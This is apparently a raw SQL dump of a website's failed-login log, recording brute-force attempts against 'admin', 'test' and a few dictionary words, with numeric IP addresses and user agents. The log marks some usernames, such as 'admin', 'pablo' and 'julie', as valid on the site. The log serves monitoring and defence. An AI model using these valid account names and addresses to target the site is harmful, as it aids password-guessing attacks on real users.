(98616, 1491918134.894169, 1, 'loginFailInvalidUsername', 'test', 0, 1892844615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98615, 1491918133.400172, 1, 'loginFailInvalidUsername', 'test', 0, 1892844615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98614, 1491913627.463823, 1, 'loginFailInvalidUsername', 'test', 0, 2332058817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98613, 1491913625.912601, 1, 'loginFailInvalidUsername', 'test', 0, 2332058817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98612, 1491912750.638194, 1, 'loginFailInvalidUsername', 'test', 0, 1203878394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98611, 1491912749.394249, 1, 'loginFailInvalidUsername', 'test', 0, 1203878394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98610, 1491908442.624647, 1, 'loginFailInvalidUsername', 'test', 0, 84802271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98609, 1491908441.350519, 1, 'loginFailInvalidUsername', 'test', 0, 84802271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98608, 1491907108.504516, 1, 'loginFailInvalidUsername', 'test', 0, 737870170, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98607, 1491907106.464629, 1, 'loginFailInvalidUsername', 'test', 0, 737870170, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98606, 1491903501.738590, 1, 'loginFailInvalidUsername', 'test', 0, 3564504202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98605, 1491903500.082931, 1, 'loginFailInvalidUsername', 'test', 0, 3564504202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98604, 1491902126.755742, 1, 'loginFailInvalidUsername', 'test', 0, 1335820244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98603, 1491901577.113485, 1, 'loginFailInvalidUsername', 'test', 0, 3173392906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98602, 1491901575.748328, 1, 'loginFailInvalidUsername', 'test', 0, 3173392906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98601, 1491899994.310835, 1, 'loginFailInvalidUsername', 'test', 0, 3022935071, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98600, 1491899992.745681, 1, 'loginFailInvalidUsername', 'test', 0, 3022935071, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98599, 1491895281.193766, 1, 'loginFailInvalidUsername', 'test', 0, 3159219059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98598, 1491889511.552269, 1, 'loginFailInvalidUsername', 'test', 0, 3058308618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98597, 1491889510.325900, 1, 'loginFailInvalidUsername', 'test', 0, 3058308618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98596, 1491888020.068052, 1, 'loginFailValidUsername', 'admin', 1, 1579183514, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98595, 1491888019.325560, 1, 'loginFailValidUsername', 'pablo', 3, 1579183514, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98594, 1491887620.871373, 1, 'loginFailInvalidUsername', 'test', 0, 3373708590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98593, 1491887619.382798, 1, 'loginFailInvalidUsername', 'test', 0, 3373708590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98592, 1491881903.723314, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98591, 1491881903.403924, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98590, 1491881903.085397, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98589, 1491881902.765406, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98588, 1491881902.446422, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98587, 1491881902.126416, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98586, 1491881901.795057, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98585, 1491881901.477096, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98584, 1491881901.088559, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98583, 1491881900.769422, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98582, 1491881900.449249, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98581, 1491881900.124944, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98580, 1491881899.793917, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98579, 1491881899.475555, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98578, 1491881899.157133, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98576, 1491881898.508018, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98577, 1491881898.838333, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98575, 1491881898.177672, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98574, 1491881897.850866, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98573, 1491879539.064309, 1, 'loginFailInvalidUsername', 'test', 0, 3190692170, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98572, 1491876506.449498, 1, 'loginFailInvalidUsername', 'test', 0, 1484644302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98571, 1491876505.411407, 1, 'loginFailInvalidUsername', 'test', 0, 1484644302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98570, 1491873807.169569, 1, 'loginFailInvalidUsername', 'test', 0, 645225201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98569, 1491868562.487114, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98568, 1491868562.168310, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98567, 1491868561.846233, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98566, 1491868561.528604, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98565, 1491868561.198366, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98564, 1491868560.879565, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98563, 1491868560.561873, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98562, 1491868560.241661, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98561, 1491868559.917637, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98560, 1491868559.587929, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98559, 1491868559.269070, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98558, 1491868558.938420, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98557, 1491868558.619615, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98556, 1491868558.302370, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98555, 1491868557.972340, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98554, 1491868557.639523, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98553, 1491868557.321674, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98552, 1491868557.004018, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98551, 1491868556.667028, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98550, 1491863819.935224, 1, 'loginFailInvalidUsername', 'test', 0, 2536603054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98549, 1491862551.355344, 1, 'loginFailInvalidUsername', 'test', 0, 1833107563, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98548, 1491862550.200512, 1, 'loginFailInvalidUsername', 'test', 0, 1833107563, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98547, 1491862408.353808, 1, 'loginFailInvalidUsername', 'test', 0, 2970192100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98546, 1491862406.942287, 1, 'loginFailInvalidUsername', 'test', 0, 2970192100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98545, 1491859445.706773, 1, 'loginFailInvalidUsername', 'test', 0, 1555628893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98544, 1491859444.650695, 1, 'loginFailInvalidUsername', 'test', 0, 1555628893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98543, 1491859400.356240, 1, 'loginFailInvalidUsername', 'test', 0, 3001018728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98542, 1491856736.813261, 1, 'loginFailInvalidUsername', 'test', 0, 1307202658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98541, 1491856735.692087, 1, 'loginFailInvalidUsername', 'test', 0, 1307202658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98540, 1491855360.425418, 1, 'loginFailInvalidUsername', 'test', 0, 657681325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98539, 1491855359.125618, 1, 'loginFailInvalidUsername', 'test', 0, 657681325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98538, 1491853762.933528, 1, 'loginFailInvalidUsername', 'test', 0, 1498370536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98537, 1491853761.882152, 1, 'loginFailInvalidUsername', 'test', 0, 1498370536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98536, 1491853248.968336, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98535, 1491853248.650358, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98534, 1491853248.331506, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98533, 1491853248.001867, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98532, 1491853247.683578, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98531, 1491853247.364324, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98530, 1491853247.045679, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98529, 1491853246.715365, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98528, 1491853246.395794, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98527, 1491853246.073287, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98526, 1491853245.750287, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98525, 1491853245.431541, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98524, 1491853245.113267, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98523, 1491853244.794738, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98522, 1491853244.475267, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98521, 1491853244.155490, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98520, 1491853243.837482, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98519, 1491853243.519404, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98518, 1491853243.198624, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98517, 1491853103.909389, 1, 'loginFailInvalidUsername', 'test', 0, 628649007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98516, 1491853102.926408, 1, 'loginFailInvalidUsername', 'test', 0, 628649007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98515, 1491849038.118788, 1, 'loginFailInvalidUsername', 'test', 0, 1535115201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98514, 1491849037.140285, 1, 'loginFailInvalidUsername', 'test', 0, 1535115201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98513, 1491844071.319176, 1, 'loginFailInvalidUsername', 'test', 0, 1768578009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98512, 1491844070.044106, 1, 'loginFailInvalidUsername', 'test', 0, 1768578009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98412, 1491810469.518834, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98413, 1491810469.836538, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98414, 1491810470.166073, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98415, 1491810470.496061, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98416, 1491810470.825631, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98417, 1491810471.144801, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98418, 1491810471.462416, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98419, 1491810471.781209, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98420, 1491810472.099890, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98421, 1491810472.601690, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98422, 1491810472.919266, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98423, 1491810473.238749, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98424, 1491810473.568894, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98425, 1491810473.887723, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98426, 1491810474.207541, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98427, 1491816332.773399, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98428, 1491816333.177678, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98429, 1491816333.498136, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98430, 1491816333.820847, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98431, 1491816334.145105, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98432, 1491816334.478153, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98433, 1491816334.811772, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98434, 1491816335.143553, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98435, 1491816335.464270, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98436, 1491816335.815039, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98437, 1491816336.136822, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98438, 1491816336.472509, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98439, 1491816336.793880, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98440, 1491816337.114106, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98441, 1491816337.437983, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98442, 1491816337.770482, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98443, 1491816338.094193, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98444, 1491816338.413878, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98445, 1491816338.746370, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98446, 1491817613.574369, 1, 'loginFailInvalidUsername', 'test', 0, 1436510797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98447, 1491817614.640082, 1, 'loginFailInvalidUsername', 'test', 0, 1436510797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98448, 1491818371.654386, 1, 'loginFailInvalidUsername', 'test', 0, 2984180062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98449, 1491818373.321628, 1, 'loginFailInvalidUsername', 'test', 0, 2984180062, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98450, 1491821325.925346, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98451, 1491821327.708221, 1, 'loginFailInvalidUsername', 'travail', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98452, 1491821329.455323, 1, 'loginFailInvalidUsername', 'namur', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98453, 1491821331.174485, 1, 'loginFailInvalidUsername', 'center', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98454, 1491821332.926006, 1, 'loginFailValidUsername', 'admin', 1, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(98455, 1491821334.678101, 1, 'loginFailValidUsername', 'julie', 2, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
